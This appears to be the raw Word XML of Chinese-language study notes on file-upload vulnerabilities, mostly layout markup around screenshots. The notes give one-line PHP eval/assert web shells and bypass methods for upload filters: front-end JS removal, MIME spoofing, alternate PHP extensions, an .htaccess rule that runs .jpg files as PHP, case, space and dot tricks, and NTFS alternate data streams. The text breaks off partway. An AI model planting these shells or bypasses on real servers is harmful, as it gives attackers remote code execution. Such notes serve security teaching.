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63515" cy="2467610"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="1" name="图片 1" descr="192960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29600825"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5263515" cy="2467610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞利用：代码没有严格校验文件类型，因此我们可以上传恶意文件（webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常见的一句话（php后门：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php @eval($_GET[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]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php @eval($_POST[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]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php @assert($_POST[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]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php @$_POST[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]($_POST[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]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注：eval();的作用是执行括号内的内容</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一．比较基础的绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.前端js过滤【抓不到包就被阻止发送，说明是前端js过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form enctype="multipart/form-data" method="post" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>onsubmit="return checkFile()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="354330"/>
            <wp:effectExtent l="0" t="0" r="1143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354330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>绕过方法：找到对应的前端代码 删掉checkfile函数 变成true 然后重新传 用中国蚁剑连接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2.绕过mime-type验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网站源码中可以看到&lt;input class="input_file" type="file" name="upload_file"&gt; 定义了上传文件的名字upload_file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网站内部代码中可以看到用$_FILES[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>upload_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>][type]比较文件类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>647065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>563880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1792605" cy="6350"/>
                <wp:effectExtent l="0" t="9525" r="10795" b="9525"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="直接连接符 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1837055" y="7617460"/>
                          <a:ext cx="1792605"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50.95pt;margin-top:44.4pt;height:0.5pt;width:141.15pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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6MVBi1wAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQ&#10;SwECFAAUAAAACACHTuJAUTHLo/gBAADBAwAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54&#10;bWxQSwUGAAAAAAYABgBZAQAAkAUAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.5pt" color="#ED7D31 [3205]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="127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230" cy="2065020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>绕过方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2448560"/>
            <wp:effectExtent l="0" t="0" r="4445"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6055" cy="2448560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.（黑名单绕过）特殊后缀绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源码如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3689350"/>
            <wp:effectExtent l="0" t="0" r="317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7325" cy="3689350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为是自己用代码获得后缀而不是通过$_FILES[][]语句获得后缀，因此无法mime绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>绕过方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>php文件后缀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>php3,php4,php5,pht,phtml,phps都是可以被解析成php文件执行，这里将.php改成.php3，文件成功上传并被解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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.htaccess绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Htaccess是个配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中.htaccess文件内容：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注：该文件名称应为空</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AddType </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application/x-httpd-php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> .jpg .txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设置当前目录所有文件都使用PHP解析，那么无论上传任何文件，只要文件内容符合PHP语言代码规范，就会被当作PHP执行。不符合则报错。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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大小写绕过，空格绕过，加点绕过（1.php.,</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代码未对文件后缀统一大小写或者去空格操作导致可以抓包进行修改文件后缀，而windows系统自动修改大小写去除空格执行文件。如图为完整过滤代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>756285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1332230</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2235835" cy="11430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="直接连接符 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1899285" y="3831590"/>
                          <a:ext cx="2235835" cy="11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59.55pt;margin-top:104.9pt;height:0.9pt;width:176.05pt;z-index:251661312;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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ql7qraAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2&#10;LnhtbFBLAQIUABQAAAAIAIdO4kApvzqB+gEAAMIDAAAOAAAAAAAAAAEAIAAAACkBAABkcnMvZTJv&#10;RG9jLnhtbFBLBQYAAAAABgAGAFkBAACVBQAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.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744220</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1086485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2726055" cy="3175"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="直接连接符 8"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="1887220" y="3585845"/>
                          <a:ext cx="2726055" cy="317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id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:0pt;flip:y;margin-left:58.6pt;margin-top:85.55pt;height:0.25pt;width:214.65pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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QS5dgAAAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQGSKlXoBAgAAywMAAA4AAAAAAAAAAQAgAAAAJwEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAJoFAAAAAA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.5pt" color="#70AD47 [3209]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5155565" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="6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55565" cy="2762250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>额外数据流【1.txt：额外数据流名称</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以看作隐藏在文件中的数据 直接打开文件不可见 只有特殊访问方式才能打开</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写入方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在cmd中进行操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Echo 内容 &gt;&gt;文件名:数据流名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Type 文件名&gt;&gt;文件名:数据流名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Notepad 文件名:数据流名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
